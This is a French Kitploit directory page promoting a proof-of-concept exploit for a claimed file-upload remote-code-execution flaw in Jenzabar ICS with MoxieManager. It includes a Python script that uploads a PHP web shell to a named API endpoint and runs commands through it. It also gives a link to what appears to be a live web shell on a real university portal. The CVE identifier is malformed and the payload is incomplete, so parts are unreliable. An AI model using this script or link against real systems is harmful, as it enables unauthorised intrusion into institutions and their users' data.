Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ICS-MoxieManager-FileUpload-PoC — CVE-2026-30-03 9.8 (Critique) RCE possible sur Jenzabar ICS + MoxieManager | Kitploit
Outils/GitHubGitHub/itsismarcos/ics-moxiemanager-fileupload-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubitsismarcos/ics-moxiemanager-fileupload-poc

ICS-MoxieManager-FileUpload-PoC

CVE-2026-30-03 9.8 (Critique) RCE possible sur Jenzabar ICS + MoxieManager

Voir le dépôt
14il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ICS-MoxieManager-RCE-CVE-2026-30-03

CVE-2026-30-03 9.8 (Critique) RCE possible Jenzabar ICS + MoxieManager

proff https://www.youtube.com/watch?v=lcfUL6Xx3f4&feature=youtu.be

CVE CVSS Impact Affecté CVE-2026-30-03 9.8 (Critique) RCE possible Jenzabar ICS + MoxieManager

Une vulnérabilité dans le composant MoxieManager utilisé par le système Jenzabar ICS peut permettre l'envoi inapproprié de fichiers qui, sous certaines conditions, peuvent être accessibles publiquement et potentiellement conduire à une exécution de code à distance (RCE). Description technique

Le problème survient en raison de :

Absence de validation adéquate des fichiers envoyés

Exposition possible des fichiers via un endpoint public :

/ICS/staticpages/getfile.aspx

Contrôle d'authentification incohérent sur l'endpoint :

/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx

Dans des scénarios spécifiques, les fichiers envoyés peuvent être stockés dans des répertoires accessibles puis récupérés ultérieurement.

Impact Téléversement arbitraire de fichiers Exposition de contenu sensible Exécution de code à distance possible (selon la configuration du serveur) Compromission totale du système

Classification CVSS v3.1 : 9.8 (Critique) Vecteur : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-434 : Téléversement de fichier sans restriction CWE-284 : Contrôle d'accès inadéquat

PoC Exploit

#!/usr/bin/env python3

CVE-2026-30-03 PoC - ICS MoxieManager RCE

import requests

TARGET = "https://example.edu" MOXIE = f"{TARGET}/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx" UUID = "5d6b24cb-7bfe-4a6b-8581-4426bf0f4101"

1. Upload PHP Shell

files = {'file': ('shell.php', '', 'application/x-php')} data = {'action': 'upload', 'path': '/1085255', 'csrf': 'E24607903E4DC7496732F267BAD48FF35D855DA9E362AB80E0340D5B5EC5F164'}

r = requests.post(MOXIE, files=files, data=data) print(f"[+] Upload: {r.status_code}")

2. Execute

SHELL = f"{TARGET}/ICS/staticpages/getfile.aspx?target=/moxiemanager/files/users/{UUID}/shell.php" print(f"[+] Shell: {SHELL}?cmd=whoami") print(requests.get(f"{SHELL}?cmd=whoami").text)

Systèmes affectés (33+ confirmés)

Remédiation Immédiate (Atténuation) :

  1. SUPPRIMER /moxiemanager/files/users/*/shell.php

  2. Restreindre getfile.aspx :

  3. RewriteRule ^/ICS/staticpages/getfile.aspx?target=.*shell.php - [F,L]

  4. Désactiver les téléversements MoxieManager

Prof https://my.rsu.edu/ICS/icsfs/shell.asp?target=61d75719-3a6a-4908-bb5d-3f9a443dd443

Télécharger l’outil